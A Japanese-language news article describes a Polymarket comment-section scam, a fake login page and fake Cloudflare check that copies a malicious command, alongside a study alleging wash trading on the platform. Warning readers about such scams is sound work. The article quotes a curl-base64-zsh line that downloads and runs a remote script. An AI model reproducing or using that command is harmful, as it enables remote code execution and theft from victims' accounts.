ポリマーケットが再び話題になっている。今回は、「25usdc」というあだ名を持つ同社の上級トレーダーの1人が、プラットフォームのコメント欄を利用して何も知らないユーザーを食い物にする計画について警鐘を鳴らしたためだ。.
これは、Polymarket プラットフォームにとって重要な時期に起こっており、同社は米国市場への再参入の準備を進めており、Kalshi などのライバルに先んじようと奮闘している。.
ポリマーケットのトレーダーは警戒を強める
25usdcによると、ハッカーはPolymarketのコメント欄を利用して詐欺を働いており、これまでにユーザーは50万ドル以上を失っているという。
「彼らはこう言う。『なぜポリマーケットのプライベートマーケットで取引しないんだ?あっちの方がずっと勝率が高いんだ!』」と25usdcは書き、この詐欺の仕組みを説明した。.
彼によると、すべては2つの別々のアカウントからYes株とNo株の両方を市場で購入することから始まる。こうすることで、「保有者」フィルターが有効になっていても、彼らのコメントは表示される。その後、彼らは難読化された形で自分のサイトのURLを投稿する。.
このURLは、何も知らないユーザーをPolymarketのロゴが入った一見無難なページに誘導し、メールでのログインを要求します。メールアドレスが確認されると、CloudFlareを模倣した新しいウィンドウがポップアップ表示され、ユーザーにアクティビティの確認を求めます。.
しかし、25usdc によれば、「コピー」をクリックすると、代わりに「curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh」のようなコマンドがコピーされ、ユーザーが誤ってこれを端末に貼り付けた場合、まず最初に base64 でエンコードされた文字列 (サーバー URL) をデコードし、その後そのサーバーからスクリプトを取得してすぐに実行するとのことです。.
問題のスクリプトにはどんな内容でも含めることができ、ポップアップ警告も表示されないと言われており、その時点で被害は発生しており、25usdc によると唯一の救済策は Wi-Fi をオフにすることかもしれないとのことです。.
「最終的に、彼らはデータを収集し、システム上のすべての情報を記録し、zipファイルをサーバーに送り返します」と25usdcは記している。「そして、このデータを使ってあなたのアカウントにログインし、お金を盗むのです。」
彼が気づいた他の点としては、このグループの活動がいかに慎重であるかということが挙げられる。例えば、彼らはウォレットを頻繁に切り替えて痕跡を隠蔽したり、あらゆる段階で難読化したり、アクティブな被害者がいないときにはペイロードを送信してログデータを受信するサーバーをシャットダウンしたりしている。.
「この問題に対処する最善の方法は、信頼できるユーザーがコメントを確認できるようにするか、大幅に低評価された投稿を非表示にする低評価システムを導入することだと思います」と25usdcは結論付け、ポリマーケットが現在表示している単純な警告は不十分だと指摘した。
PSA: ポリマーケットのような「より良いオッズ」の「プライベートマーケット」ウェブサイトは存在しません
当社の公式サイト以外では、Polymarket のメール アドレスやログイン確認コードを決して入力しないでください。.
— ポリマーケットトレーダーズ(@PolymarketTrade) 2025年11月9日
新たな調査によると、ポリマーケットの取引量はウォッシュトレーディングによって支えられているという。
Cryptopolitanとして 報道によると、コロンビア大学の研究者らが最近発表した研究によると、ポリマーケットでの取引量はウォッシュトレーディングによって大幅に水増しされていると主張している。
著者らが「人為的な取引」と呼ぶものは、時間の経過とともに変化したが、過去3年間のポリマーケットにおける売買全体のうち平均25%を占めていたという。.
この論文はまだ査読を受けていないが、すでにオープンアクセス研究プラットフォームSSRNに掲載されており、Polymarketによる査読を受けている。.
念のため言っておきますが、著者らはPolymarket自体をウォッシュトレードの罪で直接非難しているわけではありません。しかし、彼らはPolymarketの仮想通貨ベースの構造における要素を指摘し、その主張を裏付けています。
また、同社の顧客が、同社の創業者シェイン・コプラン氏が10月8日に発売の可能性を示唆していた独自のデジタルトークンにアクセスするチャンスを高めるために、dentにこのウォッシュトレーディングを行っていた可能性も示唆している。.
「ポリマーケットが私たちの論文の分析を歓迎してくれることを期待しています」と、コロンビア大学ビジネススクールの教授で、論文の4人の共著者の一人であるヤシュ・カノリア氏はメールで述べた。「仮装取引は市場に流動性や情報を追加するものではないため、本物の取引量と偽物の取引量を区別することは有益だと考えられます。」
ポリマーケットの取引量の一部が本当に「架空の」ものである場合、業界におけるポリマーケットの相対的な強さについての理解が変わり、予測市場は「大勢の知恵」を反映するという現在の考えが揺らぐ可能性があると研究は主張している。
「大規模なウォッシュトレーディングの可能性があることは、特に適切な安全対策が講じられていない可能性のある暗号通貨ベースの取引所では、取引量がプラットフォームの真の活動の指標として信頼できない可能性があることを意味している」と著者らは結論付けている。.
